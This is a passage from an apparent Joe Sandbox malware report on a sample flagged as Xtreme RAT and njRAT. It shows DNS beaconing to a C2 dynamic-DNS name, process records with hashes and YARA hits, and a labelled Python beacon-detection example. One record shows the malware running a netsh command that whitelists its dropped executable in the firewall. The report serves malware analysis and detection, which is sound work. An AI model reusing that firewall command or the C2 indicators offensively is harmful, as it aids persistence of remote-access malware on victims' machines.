                Sep 30, 2021 16:45:04.235704899 CEST  49234        53         192.168.2.3  8.8.8.8
                Sep 30, 2021 16:45:04.249644995 CEST  53           49234      8.8.8.8      192.168.2.3
                Sep 30, 2021 16:45:06.211750031 CEST  58720        53         192.168.2.3  8.8.8.8
                Sep 30, 2021 16:45:06.225447893 CEST  53           58720      8.8.8.8      192.168.2.3
                Sep 30, 2021 16:45:06.618799925 CEST  57447        53         192.168.2.3  8.8.8.8
                Sep 30, 2021 16:45:06.633373022 CEST  53           57447      8.8.8.8      192.168.2.3
                Sep 30, 2021 16:45:09.770956993 CEST  63583        53         192.168.2.3  8.8.8.8
                Sep 30, 2021 16:45:09.784416914 CEST  53           63583      8.8.8.8      192.168.2.3
                Sep 30, 2021 16:45:13.457129955 CEST  64099        53         192.168.2.3  8.8.8.8
                Sep 30, 2021 16:45:13.470329046 CEST  53           64099      8.8.8.8      192.168.2.3
                Sep 30, 2021 16:45:17.002443075 CEST  64610        53         192.168.2.3  8.8.8.8
                Sep 30, 2021 16:45:17.014648914 CEST  53           64610      8.8.8.8      192.168.2.3
                Sep 30, 2021 16:45:20.760040045 CEST  51989        53         192.168.2.3  8.8.8.8
                Sep 30, 2021 16:45:20.774147034 CEST  53           51989      8.8.8.8      192.168.2.3
                Sep 30, 2021 16:45:24.322119951 CEST  53152        53         192.168.2.3  8.8.8.8
                Sep 30, 2021 16:45:24.336463928 CEST  53           53152      8.8.8.8      192.168.2.3
                Sep 30, 2021 16:45:27.889450073 CEST  61590        53         192.168.2.3  8.8.8.8
                Sep 30, 2021 16:45:27.901789904 CEST  53           61590      8.8.8.8      192.168.2.3
                Sep 30, 2021 16:45:28.560480118 CEST  56077        53         192.168.2.3  8.8.8.8
                Sep 30, 2021 16:45:28.575278044 CEST  53           56077      8.8.8.8      192.168.2.3
                Sep 30, 2021 16:45:30.209975004 CEST  57951        53         192.168.2.3  8.8.8.8
                Sep 30, 2021 16:45:30.211796045 CEST  53276        53         192.168.2.3  8.8.8.8
                Sep 30, 2021 16:45:30.225485086 CEST  53           53276      8.8.8.8      192.168.2.3
                Sep 30, 2021 16:45:30.237848997 CEST  53           57951      8.8.8.8      192.168.2.3
                Sep 30, 2021 16:45:31.415431023 CEST  60135        53         192.168.2.3  8.8.8.8
                Sep 30, 2021 16:45:31.428962946 CEST  53           60135      8.8.8.8      192.168.2.3
                Sep 30, 2021 16:45:34.954087019 CEST  49849        53         192.168.2.3  8.8.8.8
                Sep 30, 2021 16:45:34.967259884 CEST  53           49849      8.8.8.8      192.168.2.3

                DNS Queries

                Timestamp                             Source IP    Dest IP  Trans ID  OP Code             Name                     Type            Class
                Sep 30, 2021 16:43:38.074309111 CEST  192.168.2.3  8.8.8.8  0x7b2e    Standard query (0)  windownssystem.ddns.net  A (IP address)  IN (0x0001)
                Sep 30, 2021 16:43:42.170567989 CEST  192.168.2.3  8.8.8.8  0x99c2    Standard query (0)  windownssystem.ddns.net  A (IP address)  IN (0x0001)
                Sep 30, 2021 16:43:45.749758005 CEST  192.168.2.3  8.8.8.8  0x41c0    Standard query (0)  windownssystem.ddns.net  A (IP address)  IN (0x0001)
                Sep 30, 2021 16:43:49.304711103 CEST  192.168.2.3  8.8.8.8  0x5225    Standard query (0)  windownssystem.ddns.net  A (IP address)  IN (0x0001)
                Sep 30, 2021 16:43:52.914905071 CEST  192.168.2.3  8.8.8.8  0x6dfd    Standard query (0)  windownssystem.ddns.net  A (IP address)  IN (0x0001)
                Sep 30, 2021 16:43:56.480106115 CEST  192.168.2.3  8.8.8.8  0x4106    Standard query (0)  windownssystem.ddns.net  A (IP address)  IN (0x0001)
                Sep 30, 2021 16:44:00.041601896 CEST  192.168.2.3  8.8.8.8  0x6c91    Standard query (0)  windownssystem.ddns.net  A (IP address)  IN (0x0001)
                Sep 30, 2021 16:44:03.747132063 CEST  192.168.2.3  8.8.8.8  0x7c63    Standard query (0)  windownssystem.ddns.net  A (IP address)  IN (0x0001)
                Sep 30, 2021 16:44:07.293972015 CEST  192.168.2.3  8.8.8.8  0x8df0    Standard query (0)  windownssystem.ddns.net  A (IP address)  IN (0x0001)
                Sep 30, 2021 16:44:11.084230900 CEST  192.168.2.3  8.8.8.8  0xaa88    Standard query (0)  windownssystem.ddns.net  A (IP address)  IN (0x0001)
                Sep 30, 2021 16:44:14.697310925 CEST  192.168.2.3  8.8.8.8  0xc3d9    Standard query (0)  windownssystem.ddns.net  A (IP address)  IN (0x0001)
                Sep 30, 2021 16:44:18.245699883 CEST  192.168.2.3  8.8.8.8  0xfda8    Standard query (0)  windownssystem.ddns.net  A (IP address)  IN (0x0001)
                Sep 30, 2021 16:44:22.152010918 CEST  192.168.2.3  8.8.8.8  0x9587    Standard query (0)  windownssystem.ddns.net  A (IP address)  IN (0x0001)
                Sep 30, 2021 16:44:25.784673929 CEST  192.168.2.3  8.8.8.8  0x87d8    Standard query (0)  windownssystem.ddns.net  A (IP address)  IN (0x0001)
                Sep 30, 2021 16:44:29.328229904 CEST  192.168.2.3  8.8.8.8  0x3033    Standard query (0)  windownssystem.ddns.net  A (IP address)  IN (0x0001)
                Sep 30, 2021 16:44:32.872898102 CEST  192.168.2.3  8.8.8.8  0x2205    Standard query (0)  windownssystem.ddns.net  A (IP address)  IN (0x0001)
                Sep 30, 2021 16:44:36.526617050 CEST  192.168.2.3  8.8.8.8  0x50b0    Standard query (0)  windownssystem.ddns.net  A (IP address)  IN (0x0001)
                Sep 30, 2021 16:44:40.077255011 CEST  192.168.2.3  8.8.8.8  0x379d    Standard query (0)  windownssystem.ddns.net  A (IP address)  IN (0x0001)
                Sep 30, 2021 16:44:43.693994999 CEST  192.168.2.3  8.8.8.8  0x216f    Standard query (0)  windownssystem.ddns.net  A (IP address)  IN (0x0001)
                Sep 30, 2021 16:44:47.248116970 CEST  192.168.2.3  8.8.8.8  0x4000    Standard query (0)  windownssystem.ddns.net  A (IP address)  IN (0x0001)
                Sep 30, 2021 16:44:50.792040110 CEST  192.168.2.3  8.8.8.8  0xde99    Standard query (0)  windownssystem.ddns.net  A (IP address)  IN (0x0001)
                Sep 30, 2021 16:44:54.339596987 CEST  192.168.2.3  8.8.8.8  0x5e1f    Standard query (0)  windownssystem.ddns.net  A (IP address)  IN (0x0001)
                Sep 30, 2021 16:44:57.888556004 CEST  192.168.2.3  8.8.8.8  0xcbd3    Standard query (0)  windownssystem.ddns.net  A (IP address)  IN (0x0001)
                Sep 30, 2021 16:44:58.971708059 CEST  192.168.2.3  8.8.8.8  0xcbd3    Standard query (0)  windownssystem.ddns.net  A (IP address)  IN (0x0001)
                Sep 30, 2021 16:45:02.654875040 CEST  192.168.2.3  8.8.8.8  0x3f15    Standard query (0)  windownssystem.ddns.net  A (IP address)  IN (0x0001)
                Sep 30, 2021 16:45:06.211750031 CEST  192.168.2.3  8.8.8.8  0xb135    Standard query (0)  windownssystem.ddns.net  A (IP address)  IN (0x0001)
                Sep 30, 2021 16:45:09.770956993 CEST  192.168.2.3  8.8.8.8  0xaf7a    Standard query (0)  windownssystem.ddns.net  A (IP address)  IN (0x0001)
                Sep 30, 2021 16:45:13.457129955 CEST  192.168.2.3  8.8.8.8  0xd330    Standard query (0)  windownssystem.ddns.net  A (IP address)  IN (0x0001)
                Sep 30, 2021 16:45:17.002443075 CEST  192.168.2.3  8.8.8.8  0xc57b    Standard query (0)  windownssystem.ddns.net  A (IP address)  IN (0x0001)
                Sep 30, 2021 16:45:20.760040045 CEST  192.168.2.3  8.8.8.8  0x4333    Standard query (0)  windownssystem.ddns.net  A (IP address)  IN (0x0001)
                Sep 30, 2021 16:45:24.322119951 CEST  192.168.2.3  8.8.8.8  0xf18b    Standard query (0)  windownssystem.ddns.net  A (IP address)  IN (0x0001)
                Sep 30, 2021 16:45:27.889450073 CEST  192.168.2.3  8.8.8.8  0x1ca5    Standard query (0)  windownssystem.ddns.net  A (IP address)  IN (0x0001)
                Sep 30, 2021 16:45:31.415431023 CEST  192.168.2.3  8.8.8.8  0x88fa    Standard query (0)  windownssystem.ddns.net  A (IP address)  IN (0x0001)
                Sep 30, 2021 16:45:34.954087019 CEST  192.168.2.3  8.8.8.8  0xf679    Standard query (0)  windownssystem.ddns.net  A (IP address)  IN (0x0001)

                DNS Answers

                Timestamp                             Source IP  Dest IP      Trans ID  Reply Code      Name                     CName  Address  Type            Class
                Sep 30, 2021 16:43:38.096344948 CEST  8.8.8.8    192.168.2.3  0x7b2e    Name error (3)  windownssystem.ddns.net  none   none     A (IP address)  IN (0x0001)
                Sep 30, 2021 16:43:42.191853046 CEST  8.8.8.8    192.168.2.3  0x99c2    Name error (3)  windownssystem.ddns.net  none   none     A (IP address)  IN (0x0001)
                Sep 30, 2021 16:43:45.764856100 CEST  8.8.8.8    192.168.2.3  0x41c0    Name error (3)  windownssystem.ddns.net  none   none     A (IP address)  IN (0x0001)
                Sep 30, 2021 16:43:49.327239990 CEST  8.8.8.8    192.168.2.3  0x5225    Name error (3)  windownssystem.ddns.net  none   none     A (IP address)  IN (0x0001)
                Sep 30, 2021 16:43:52.927978992 CEST  8.8.8.8    192.168.2.3  0x6dfd    Name error (3)  windownssystem.ddns.net  none   none     A (IP address)  IN (0x0001)
                Sep 30, 2021 16:43:56.503549099 CEST  8.8.8.8    192.168.2.3  0x4106    Name error (3)  windownssystem.ddns.net  none   none     A (IP address)  IN (0x0001)
                Sep 30, 2021 16:44:00.088879108 CEST  8.8.8.8    192.168.2.3  0x6c91    Name error (3)  windownssystem.ddns.net  none   none     A (IP address)  IN (0x0001)
                Sep 30, 2021 16:44:03.760642052 CEST  8.8.8.8    192.168.2.3  0x7c63    Name error (3)  windownssystem.ddns.net  none   none     A (IP address)  IN (0x0001)
                Sep 30, 2021 16:44:07.307854891 CEST  8.8.8.8    192.168.2.3  0x8df0    Name error (3)  windownssystem.ddns.net  none   none     A (IP address)  IN (0x0001)
                Sep 30, 2021 16:44:11.098330021 CEST  8.8.8.8    192.168.2.3  0xaa88    Name error (3)  windownssystem.ddns.net  none   none     A (IP address)  IN (0x0001)
                Sep 30, 2021 16:44:14.717567921 CEST  8.8.8.8    192.168.2.3  0xc3d9    Name error (3)  windownssystem.ddns.net  none   none     A (IP address)  IN (0x0001)
                Sep 30, 2021 16:44:18.258774042 CEST  8.8.8.8    192.168.2.3  0xfda8    Name error (3)  windownssystem.ddns.net  none   none     A (IP address)  IN (0x0001)
                Sep 30, 2021 16:44:22.165651083 CEST  8.8.8.8    192.168.2.3  0x9587    Name error (3)  windownssystem.ddns.net  none   none     A (IP address)  IN (0x0001)
                Sep 30, 2021 16:44:25.798405886 CEST  8.8.8.8    192.168.2.3  0x87d8    Name error (3)  windownssystem.ddns.net  none   none     A (IP address)  IN (0x0001)
                Sep 30, 2021 16:44:29.341336966 CEST  8.8.8.8    192.168.2.3  0x3033    Name error (3)  windownssystem.ddns.net  none   none     A (IP address)  IN (0x0001)
                Sep 30, 2021 16:44:32.887037039 CEST  8.8.8.8    192.168.2.3  0x2205    Name error (3)  windownssystem.ddns.net  none   none     A (IP address)  IN (0x0001)
                Sep 30, 2021 16:44:36.541001081 CEST  8.8.8.8    192.168.2.3  0x50b0    Name error (3)  windownssystem.ddns.net  none   none     A (IP address)  IN (0x0001)
                Sep 30, 2021 16:44:40.098599911 CEST  8.8.8.8    192.168.2.3  0x379d    Name error (3)  windownssystem.ddns.net  none   none     A (IP address)  IN (0x0001)
                Sep 30, 2021 16:44:43.710228920 CEST  8.8.8.8    192.168.2.3  0x216f    Name error (3)  windownssystem.ddns.net  none   none     A (IP address)  IN (0x0001)
                Sep 30, 2021 16:44:47.261413097 CEST  8.8.8.8    192.168.2.3  0x4000    Name error (3)  windownssystem.ddns.net  none   none     A (IP address)  IN (0x0001)
                Sep 30, 2021 16:44:50.806456089 CEST  8.8.8.8    192.168.2.3  0xde99    Name error (3)  windownssystem.ddns.net  none   none     A (IP address)  IN (0x0001)
                Sep 30, 2021 16:44:54.353445053 CEST  8.8.8.8    192.168.2.3  0x5e1f    Name error (3)  windownssystem.ddns.net  none   none     A (IP address)  IN (0x0001)
                Sep 30, 2021 16:44:58.984798908 CEST  8.8.8.8    192.168.2.3  0xcbd3    Name error (3)  windownssystem.ddns.net  none   none     A (IP address)  IN (0x0001)
                Sep 30, 2021 16:45:02.669064045 CEST  8.8.8.8    192.168.2.3  0x3f15    Name error (3)  windownssystem.ddns.net  none   none     A (IP address)  IN (0x0001)
                Sep 30, 2021 16:45:06.225447893 CEST  8.8.8.8    192.168.2.3  0xb135    Name error (3)  windownssystem.ddns.net  none   none     A (IP address)  IN (0x0001)
                Sep 30, 2021 16:45:09.784416914 CEST  8.8.8.8    192.168.2.3  0xaf7a    Name error (3)  windownssystem.ddns.net  none   none     A (IP address)  IN (0x0001)
                Sep 30, 2021 16:45:13.470329046 CEST  8.8.8.8    192.168.2.3  0xd330    Name error (3)  windownssystem.ddns.net  none   none     A (IP address)  IN (0x0001)
                Sep 30, 2021 16:45:17.014648914 CEST  8.8.8.8    192.168.2.3  0xc57b    Name error (3)  windownssystem.ddns.net  none   none     A (IP address)  IN (0x0001)
                Sep 30, 2021 16:45:20.774147034 CEST  8.8.8.8    192.168.2.3  0x4333    Name error (3)  windownssystem.ddns.net  none   none     A (IP address)  IN (0x0001)
                Sep 30, 2021 16:45:24.336463928 CEST  8.8.8.8    192.168.2.3  0xf18b    Name error (3)  windownssystem.ddns.net  none   none     A (IP address)  IN (0x0001)
                Sep 30, 2021 16:45:27.901789904 CEST  8.8.8.8    192.168.2.3  0x1ca5    Name error (3)  windownssystem.ddns.net  none   none     A (IP address)  IN (0x0001)
                Sep 30, 2021 16:45:31.428962946 CEST  8.8.8.8    192.168.2.3  0x88fa    Name error (3)  windownssystem.ddns.net  none   none     A (IP address)  IN (0x0001)
                Sep 30, 2021 16:45:34.967259884 CEST  8.8.8.8    192.168.2.3  0xf679    Name error (3)  windownssystem.ddns.net  none   none     A (IP address)  IN (0x0001)
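Every lookup above is for the same dynamic-DNS name, windownssystem.ddns.net, spaced roughly 3.5 s apart, and every one of them returns NXDOMAIN: the C2 hostname was not registered at the time of analysis, so this report contains no C2 session and the network picture is incomplete. That pattern (fixed-interval lookups of one dyn-DNS name that never resolves) is also what a resolver-log detection can key on, which is what the added example below does; it is not part of the Joe Sandbox report. The log lines are constructed: the ten windownssystem.ddns.net entries reuse the timestamps and NXDOMAIN results from the tables above, the two other names are made up for contrast, and the line format is this example's own, so parse_line() is the only function to adapt for a real resolver log.

```python
"""Periodic-lookup (beacon) detection over DNS query logs (added example, not report code)."""
import statistics
from datetime import datetime

# Starter list of dynamic-DNS suffixes; extend it from your own intel.
DYNDNS_SUFFIXES = ("ddns.net", "no-ip.org", "no-ip.biz", "hopto.org", "zapto.org", "duckdns.org", "dyndns.org")

# Constructed sample log: date time client resolver qname qtype rcode.
# The windownssystem.ddns.net rows mirror this report's DNS tables; the example.* rows are invented benign noise.
SAMPLE_LOG = """\
2021-09-30 16:43:20.096 192.168.2.3 8.8.8.8 time.example.net A NOERROR
2021-09-30 16:43:27.934 192.168.2.3 8.8.8.8 time.example.net A NOERROR
2021-09-30 16:43:38.074 192.168.2.3 8.8.8.8 windownssystem.ddns.net A NXDOMAIN
2021-09-30 16:43:42.170 192.168.2.3 8.8.8.8 windownssystem.ddns.net A NXDOMAIN
2021-09-30 16:43:44.799 192.168.2.3 8.8.8.8 ctldl.example.com A NOERROR
2021-09-30 16:43:45.749 192.168.2.3 8.8.8.8 windownssystem.ddns.net A NXDOMAIN
2021-09-30 16:43:49.304 192.168.2.3 8.8.8.8 windownssystem.ddns.net A NXDOMAIN
2021-09-30 16:43:52.914 192.168.2.3 8.8.8.8 windownssystem.ddns.net A NXDOMAIN
2021-09-30 16:43:56.480 192.168.2.3 8.8.8.8 windownssystem.ddns.net A NXDOMAIN
2021-09-30 16:44:00.041 192.168.2.3 8.8.8.8 windownssystem.ddns.net A NXDOMAIN
2021-09-30 16:44:03.747 192.168.2.3 8.8.8.8 windownssystem.ddns.net A NXDOMAIN
2021-09-30 16:44:07.293 192.168.2.3 8.8.8.8 windownssystem.ddns.net A NXDOMAIN
2021-09-30 16:44:11.084 192.168.2.3 8.8.8.8 windownssystem.ddns.net A NXDOMAIN
"""


def parse_line(line):
    """Adapt this to the real resolver format; everything else works on the returned dict."""
    date, clock, src, dst, name, qtype, rcode = line.split()
    ts = datetime.strptime(f"{date} {clock}", "%Y-%m-%d %H:%M:%S.%f")
    return {"ts": ts, "src": src, "dst": dst, "name": name.lower().rstrip("."), "qtype": qtype, "rcode": rcode}


def is_dyndns(name):
    return any(name == s or name.endswith("." + s) for s in DYNDNS_SUFFIXES)


def profile_queries(lines, min_queries=5, max_jitter=0.25, min_nxdomain_ratio=0.9):
    """Per-name interval statistics; 'beacon' is set for regular lookups that mostly fail or hit a dyn-DNS zone."""
    by_name = {}
    for rec in (parse_line(l) for l in lines if l.strip()):
        by_name.setdefault(rec["name"], []).append(rec)
    profiles = {}
    for name, recs in by_name.items():
        recs.sort(key=lambda r: r["ts"])
        gaps = [(b["ts"] - a["ts"]).total_seconds() for a, b in zip(recs, recs[1:])]
        nx_ratio = sum(r["rcode"] == "NXDOMAIN" for r in recs) / len(recs)
        median = statistics.median(gaps) if gaps else 0.0
        # jitter = largest deviation from the median gap, relative to the median (0 = perfectly periodic)
        jitter = max(abs(g - median) for g in gaps) / median if gaps and median > 0 else None
        periodic = len(recs) >= min_queries and jitter is not None and jitter <= max_jitter
        beacon = periodic and (nx_ratio >= min_nxdomain_ratio or is_dyndns(name))
        profiles[name] = {
            "count": len(recs),
            "median_gap_s": round(median, 3),
            "jitter": None if jitter is None else round(jitter, 3),
            "nxdomain_ratio": round(nx_ratio, 3),
            "dyndns": is_dyndns(name),
            "beacon": beacon,
        }
    return profiles


if __name__ == "__main__":
    for name, p in profile_queries(SAMPLE_LOG.splitlines()).items():
        flag = "BEACON" if p["beacon"] else "ok"
        print(f"{flag:6} {name:28} n={p['count']:<3} median={p['median_gap_s']:<6} "
              f"jitter={p['jitter']} nxdomain={p['nxdomain_ratio']} dyndns={p['dyndns']}")
```

Two caveats when running this against real logs: collapse resolver retransmits first (the 16:44:57.888 and 16:44:58.971 queries above share transaction ID 0xcbd3 and are one lookup, not two), and treat the NXDOMAIN ratio as a signal about the infrastructure's state at capture time, since the same name will resolve normally once the operator registers it.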

                Code Manipulations

                Statistics

                CPU Usage, Memory Usage, High Level Behavior Distribution and Behavior: per-process charts in the original report, not reproduced here.

                System Behavior

                General

                Start time: 16:43:25
                Start date: 30/09/2021
                Path: C:\Users\user\Desktop\7FW4ce2RDy.exe
                Wow64 process (32bit): true
                Commandline: 'C:\Users\user\Desktop\7FW4ce2RDy.exe'
                Imagebase: 0x10000000
                File size: 354304 bytes
                MD5 hash: 776211EED31B6A8EA3539AC1D822362C
                Has elevated privileges: true
                Has administrator privileges: true
                Programmed in: C, C++ or other language
                Yara matches:
                • Rule: xtremrat, Description: Xtrem RAT v3.5, Source: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp, Author: Jean-Philippe Teissier / @Jipe_
                • Rule: xtremrat, Description: Xtrem RAT v3.5, Source: 00000000.00000000.291223895.0000000010056000.00000008.00020000.sdmp, Author: Jean-Philippe Teissier / @Jipe_
                • Rule: RAT_Xtreme, Description: Detects Xtreme RAT, Source: 00000000.00000000.291198500.0000000010001000.00000080.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                • Rule: JoeSecurity_XtremeRat, Description: Yara detected Xtreme RAT, Source: 00000000.00000000.291198500.0000000010001000.00000080.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                • Rule: xtremrat, Description: Xtrem RAT v3.5, Source: 00000000.00000000.291198500.0000000010001000.00000080.00020000.sdmp, Author: Jean-Philippe Teissier / @Jipe_
                • Rule: RAT_njRat, Description: Detects njRAT, Source: 00000000.00000003.295553833.00000000007A2000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000000.00000003.295553833.00000000007A2000.00000004.00000001.sdmp, Author: Joe Security
                • Rule: njrat1, Description: Identify njRat, Source: 00000000.00000003.295553833.00000000007A2000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter
                • Rule: RAT_Xtreme, Description: Detects Xtreme RAT, Source: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                • Rule: JoeSecurity_XtremeRat, Description: Yara detected Xtreme RAT, Source: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                • Rule: xtremrat, Description: Xtrem RAT v3.5, Source: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Author: Jean-Philippe Teissier / @Jipe_
                • Rule: RAT_njRat, Description: Detects njRAT, Source: 00000000.00000003.295774602.000000000079A000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000000.00000003.295774602.000000000079A000.00000004.00000001.sdmp, Author: Joe Security
                • Rule: njrat1, Description: Identify njRat, Source: 00000000.00000003.295774602.000000000079A000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter
                • Rule: xtremrat, Description: Xtrem RAT v3.5, Source: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp, Author: Jean-Philippe Teissier / @Jipe_
                • Rule: xtremrat, Description: Xtrem RAT v3.5, Source: 00000000.00000000.291215045.0000000010048000.00000080.00020000.sdmp, Author: Jean-Philippe Teissier / @Jipe_
                Reputation:low

                General

                Start time: 16:43:26
                Start date: 30/09/2021
                Path: C:\Windows\SysWOW64\svchost.exe
                Wow64 process (32bit): true
                Commandline: svchost.exe
                Imagebase: 0x1b0000
                File size: 44520 bytes
                MD5 hash: FA6C268A5B5BDA067A901764D203D433
                Has elevated privileges: true
                Has administrator privileges: true
                Programmed in: C, C++ or other language
                Yara matches:
                • Rule: xtremrat, Description: Xtrem RAT v3.5, Source: 00000001.00000002.304153426.0000000010048000.00000040.00000001.sdmp, Author: Jean-Philippe Teissier / @Jipe_
                • Rule: xtremrat, Description: Xtrem RAT v3.5, Source: 00000001.00000000.293164908.0000000010048000.00000040.00000001.sdmp, Author: Jean-Philippe Teissier / @Jipe_
                • Rule: RAT_Xtreme, Description: Detects Xtreme RAT, Source: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                • Rule: Xtreme_Sep17_1, Description: Detects XTREME sample analyzed in September 2017, Source: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, Author: Florian Roth
                • Rule: JoeSecurity_XtremeRat, Description: Yara detected Xtreme RAT, Source: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                • Rule: xtremrat, Description: Xtrem RAT v3.5, Source: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, Author: Jean-Philippe Teissier / @Jipe_
                • Rule: RAT_Xtreme, Description: Detects Xtreme RAT, Source: 00000001.00000000.293137876.0000000010000000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                • Rule: Xtreme_Sep17_1, Description: Detects XTREME sample analyzed in September 2017, Source: 00000001.00000000.293137876.0000000010000000.00000040.00000001.sdmp, Author: Florian Roth
                • Rule: JoeSecurity_XtremeRat, Description: Yara detected Xtreme RAT, Source: 00000001.00000000.293137876.0000000010000000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                • Rule: xtremrat, Description: Xtrem RAT v3.5, Source: 00000001.00000000.293137876.0000000010000000.00000040.00000001.sdmp, Author: Jean-Philippe Teissier / @Jipe_
                Reputation:high

                General

                Start time:16:43:26
                Start date:30/09/2021
                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                Wow64 process (32bit):
                Commandline:C:\Program Files\Google\Chrome\Application\chrome.exe
                Imagebase:
                File size:2150896 bytes
                MD5 hash:C139654B5C1438A95B321BB01AD63EF6
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:16:43:27
                Start date:30/09/2021
                Path:C:\Windows\SysWOW64\562Server.exe
                Wow64 process (32bit):true
                Commandline:'C:\Windows\system32\562Server.exe'
                Imagebase:0x1d0000
                File size:29696 bytes
                MD5 hash:B207157C9F171556BF4D240C14AABA0E
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:.Net C# or VB.NET
                Yara matches:
                • Rule: RAT_njRat, Description: Detects njRAT, Source: 00000004.00000000.295421440.00000000001D2000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000004.00000000.295421440.00000000001D2000.00000002.00020000.sdmp, Author: Joe Security
                • Rule: njrat1, Description: Identify njRat, Source: 00000004.00000000.295421440.00000000001D2000.00000002.00020000.sdmp, Author: Brian Wallace @botnet_hunter
                • Rule: RAT_njRat, Description: Detects njRAT, Source: 00000004.00000002.300093433.00000000001D2000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000004.00000002.300093433.00000000001D2000.00000002.00020000.sdmp, Author: Joe Security
                • Rule: njrat1, Description: Identify njRat, Source: 00000004.00000002.300093433.00000000001D2000.00000002.00020000.sdmp, Author: Brian Wallace @botnet_hunter
                • Rule: RAT_njRat, Description: Detects njRAT, Source: C:\Windows\SysWOW64\562Server.exe, Author: Kevin Breen <kevin@techanarchy.net>
                • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: C:\Windows\SysWOW64\562Server.exe, Author: Joe Security
                • Rule: njrat1, Description: Identify njRat, Source: C:\Windows\SysWOW64\562Server.exe, Author: Brian Wallace @botnet_hunter
                Antivirus matches:
                • Detection: 100%, Avira
                • Detection: 100%, Joe Sandbox ML
                • Detection: 95%, ReversingLabs
                Reputation:low

                General

                Start time:16:43:28
                Start date:30/09/2021
                Path:C:\Windows\SysWOW64\WerFault.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3652 -s 564
                Imagebase:0xef0000
                File size:434592 bytes
                MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:16:43:29
                Start date:30/09/2021
                Path:C:\Users\user\AppData\Local\Temp\System.exe
                Wow64 process (32bit):true
                Commandline:'C:\Users\user\AppData\Local\Temp\System.exe'
                Imagebase:0x3e0000
                File size:29696 bytes
                MD5 hash:B207157C9F171556BF4D240C14AABA0E
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:.Net C# or VB.NET
                Yara matches:
                • Rule: RAT_njRat, Description: Detects njRAT, Source: 00000008.00000000.299745785.00000000003E2000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000008.00000000.299745785.00000000003E2000.00000002.00020000.sdmp, Author: Joe Security
                • Rule: njrat1, Description: Identify njRat, Source: 00000008.00000000.299745785.00000000003E2000.00000002.00020000.sdmp, Author: Brian Wallace @botnet_hunter
                • Rule: RAT_njRat, Description: Detects njRAT, Source: 00000008.00000002.557860043.00000000003E2000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000008.00000002.557860043.00000000003E2000.00000002.00020000.sdmp, Author: Joe Security
                • Rule: njrat1, Description: Identify njRat, Source: 00000008.00000002.557860043.00000000003E2000.00000002.00020000.sdmp, Author: Brian Wallace @botnet_hunter
                • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000008.00000002.559691939.00000000029E1000.00000004.00000001.sdmp, Author: Joe Security
                • Rule: RAT_njRat, Description: Detects njRAT, Source: C:\Users\user\AppData\Local\Temp\System.exe, Author: Kevin Breen <kevin@techanarchy.net>
                • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: C:\Users\user\AppData\Local\Temp\System.exe, Author: Joe Security
                • Rule: njrat1, Description: Identify njRat, Source: C:\Users\user\AppData\Local\Temp\System.exe, Author: Brian Wallace @botnet_hunter
                Antivirus matches:
                • Detection: 100%, Avira
                • Detection: 100%, Joe Sandbox ML
                • Detection: 95%, ReversingLabs
                Reputation:low

                General

                Start time:16:43:29
                Start date:30/09/2021
                Path:C:\Windows\SysWOW64\WerFault.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3652 -s 512
                Imagebase:0xef0000
                File size:434592 bytes
                MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:16:43:32
                Start date:30/09/2021
                Path:C:\Windows\SysWOW64\netsh.exe
                Wow64 process (32bit):true
                Commandline:netsh firewall add allowedprogram 'C:\Users\user\AppData\Local\Temp\System.exe' 'System.exe' ENABLE
                Imagebase:0xe40000
                File size:82944 bytes
                MD5 hash:A0AA3322BB46BBFC36AB9DC1DBBBB807
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:16:43:33
                Start date:30/09/2021
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff70d6e0000
